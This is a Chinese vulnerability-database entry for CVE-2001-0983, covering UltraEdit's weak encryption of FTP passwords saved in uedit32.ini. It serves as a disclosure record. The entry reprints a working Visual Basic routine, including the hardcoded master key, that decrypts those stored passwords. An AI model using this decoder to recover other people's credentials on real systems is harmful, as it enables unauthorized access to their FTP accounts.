UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞

UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞

漏洞ID 1106471 漏洞类型 未知
发布时间 2001-08-23 更新时间 2001-08-31
图片[1]-UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞-安全小百科CVE编号 CVE-2001-0983
图片[2]-UltraEdit uedit32.ini FTP密码泄露和权限提升漏洞-安全小百科CNNVD-ID CNNVD-200108-158
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/21091
https://www.securityfocus.com/bid/89122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-158
|漏洞详情
UltraEdit记录uedit32.ini文件的FTP密码时使用弱加密,能够读取文件的本地用户可以利用该漏洞译码并获取权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3234/info

UltraEdit is a multi-featured commercial text editor with support for HTML, C/C++, VB, Java, Perl, XML, and C#. It also includes a hex editor and a small FTP client.

UltraEdit's FTP client has a feature which will remember FTP passwords for later use. When passwords are remembered they will be stored on the system using an "admittedly" weak encryption algorithm. As a result, it is a fairly trivial task to decrypt the passwords for FTP accounts.

Successful exploitation of this vulnerability will allow a local attacker to gain unauthorized access to the FTP sites used by other local users.

This piece of VB code will decode the passwords stored in uedit32.ini for the FTP accounts


' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' ? if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe
Private Const Masterkey = "sdfkh we;34u[ jwef "

'Decode a single character
Public Function UEDecode(i_Asc, ByVal i_Pos As Integer)

i_Pos = i_Pos Mod 19
If i_Pos = 0 Then i_Pos = 19

UEDecode = ((Not i_Asc) And Asc(Mid(Masterkey, i_Pos, 1))) + (i_Asc And ((Not Asc(Mid(Masterkey, i_Pos, 1))) And 127))

End Function

'Decode password
Public Function UEDecodeString(str_password As String)

Dim i As Integer

UEDecodeString = ""

For i = 1 To (Len(str_password) / 2)
UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i))
Next i

End Function
|受影响的产品
Ultraedit Ultraedit-32 0
|参考资料

来源:www.eve-software.com
链接:http://www.eve-software.com/security/ueditpw.html
来源:BUGTRAQ
名称:20010823Re:Respondusv1.1.2storespasswordsusingweakencryption
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99861651923668&w;=2

相关推荐: Microburst uStorekeeper Remote Arbitrary Commands Vulnerability

Microburst uStorekeeper Remote Arbitrary Commands Vulnerability 漏洞ID 1103322 漏洞类型 Input Validation Error 发布时间 2001-04-02 更新时间 2001…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享